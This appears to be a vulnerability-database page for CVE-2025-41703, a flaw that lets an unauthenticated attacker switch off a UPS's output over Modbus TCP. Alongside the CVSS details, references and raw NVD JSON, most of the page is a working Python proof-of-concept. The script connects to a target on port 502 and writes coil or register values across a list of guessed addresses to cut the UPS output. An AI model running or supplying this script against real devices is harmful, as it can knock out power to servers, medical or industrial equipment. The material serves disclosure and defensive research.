Security Vulnerability Report
CVE-2025-41703 CVSS 7.5 HIGH

Published: 2025-10-14 08:15:35
Last Modified: 2026-04-15 00:35:42

Description

An unauthenticated remote attacker can cause a Denial of Service by turning off the output of the UPS via Modbus command.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

UPS devices that support the Modbus TCP protocol (for the specific affected versions, refer to the vendor security advisory VDE-2025-072).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-41703 - UPS Modbus Denial of Service PoC
# This PoC demonstrates how an unauthenticated attacker can
# turn off the output of a UPS via Modbus TCP command.

from pymodbus.client import ModbusTcpClient
import sys
import argparse


def exploit_ups_modbus(target_host, target_port=502):
    """
    Send Modbus command to turn off UPS output.
    Uses Write Single Coil (function code 05) to control the output relay.
    """
    try:
        # Connect to the target UPS Modbus TCP service
        client = ModbusTcpClient(target_host, port=target_port, timeout=5)
        connection = client.connect()

        if not connection:
            print(f"[-] Failed to connect to {target_host}:{target_port}")
            return False

        print(f"[+] Connected to UPS Modbus service at {target_host}:{target_port}")

        # Common UPS Modbus registers for output control
        # Register address may vary by manufacturer
        output_control_registers = [
            0x0001,  # Common output control register
            0x0010,  # Alternative output control register
            0x0100,  # Some UPS models
            0x0002,  # Output enable/disable register
        ]

        for register_addr in output_control_registers:
            try:
                # Write Single Coil - turn off output (value = 0x0000)
                # Coil OFF = 0x0000, Coil ON = 0xFF00
                response = client.write_coil(
                    address=register_addr,
                    value=False,  # False = turn off output
                    slave=1  # Default slave ID for UPS
                )

                if response and not response.isError():
                    print(f"[+] Successfully sent OFF command to register {hex(register_addr)}")
                    print(f"[+] UPS output has been disabled!")
                    return True

            except Exception as e:
                print(f"[-] Register {hex(register_addr)} failed: {e}")
                continue

        # Alternative: Try Write Single Register approach
        for register_addr in output_control_registers:
            try:
                # Write 0 to output control register
                response = client.write_register(
                    address=register_addr,
                    value=0,  # 0 = turn off
                    slave=1
                )

                if response and not response.isError():
                    print(f"[+] Successfully wrote 0 to register {hex(register_addr)}")
                    print(f"[+] UPS output has been disabled!")
                    return True

            except Exception as e:
                print(f"[-] Register {hex(register_addr)} failed: {e}")
                continue

        client.close()
        return False

    except Exception as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-41703 UPS Modbus DoS PoC')
    parser.add_argument('target', help='Target UPS IP address')
    parser.add_argument('-p', '--port', type=int, default=502, help='Modbus TCP port (default: 502)')

    args = parser.parse_args()

    print(f"[*] CVE-2025-41703 - UPS Modbus Denial of Service PoC")
    print(f"[*] Target: {args.target}:{args.port}")
    print(f"[*] WARNING: This will turn off the UPS output!")
    print()

    success = exploit_ups_modbus(args.target, args.port)

    if success:
        print("[!] Exploit completed successfully - UPS output is OFF")
        sys.exit(0)
    else:
        print("[-] Exploit failed - target may not be vulnerable or uses different register mapping")
        sys.exit(1)

References

https://certvde.com/de/advisories/VDE-2025-072
http://seclists.org/fulldisclosure/2025/Oct/12

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41703", "sourceIdentifier": "[email protected]", "published": "2025-10-14T08:15:34.763", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated remote attacker can cause a Denial of Service by turning off the output of the UPS via Modbus command."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2025-072", "source": "[email protected]"}, {"url": "http://seclists.org/fulldisclosure/2025/Oct/12", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}